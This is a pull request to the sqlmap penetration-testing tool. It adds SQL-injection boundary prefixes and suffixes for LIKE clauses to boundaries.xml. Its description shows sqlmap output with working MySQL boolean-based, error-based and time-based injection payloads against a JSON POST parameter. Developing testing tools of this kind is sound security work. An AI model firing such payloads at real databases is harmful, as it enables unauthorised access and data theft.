### PR TITLE
add prefix % to boundaries.xml

### DIFF
--- a/xml/boundaries.xml
+++ b/xml/boundaries.xml
@@ -286,6 +286,78 @@ Formats:
     </boundary>
 
     <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')</prefix>
+        <suffix> AND ('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'))</prefix>
+        <suffix> AND (('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')))</prefix>
+        <suffix> AND ((('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'</prefix>
+        <suffix> AND '%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")</prefix>
+        <suffix> AND ("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"))</prefix>
+        <suffix> AND (("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")))</prefix>
+        <suffix> AND ((("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"</prefix>
+        <suffix> AND "%"="</suffix>
+    </boundary>
+
+    <boundary>
         <level>3</level>
         <clause>1</clause>
         <where>1,2</where>


### PR DESCRIPTION
After add prefix '%':

```
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: paramsGrid={"page":1,"pageSize":10,"sortName":"vehicleId","sortOrder":"desc","whereparams":[{"name":"keyWord","value":"%' AND 3105=3105 AND '%'='"}]}
    Vector: AND [INFERENCE]

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: paramsGrid={"page":1,"pageSize":10,"sortName":"vehicleId","sortOrder":"desc","whereparams":[{"name":"keyWord","value":"%' AND (SELECT 3075 FROM(SELECT COUNT(*),CONCAT(0x71786a6a71,(SELECT (ELT(3075=3075,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND '%'='"}]}
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: paramsGrid={"page":1,"pageSize":10,"sortName":"vehicleId","sortOrder":"desc","whereparams":[{"name":"keyWord","value":"%' AND SLEEP(5) AND '%'='"}]}
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

[03:22:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0

```

I found that sqlmap removed prefix '%' from boundaries.xml(v1.2.11/v1,2,10/v1.2.9/master),may I ask why?
After add prefix '%' can find more vulnerable parameter(such as LIKE '%test%').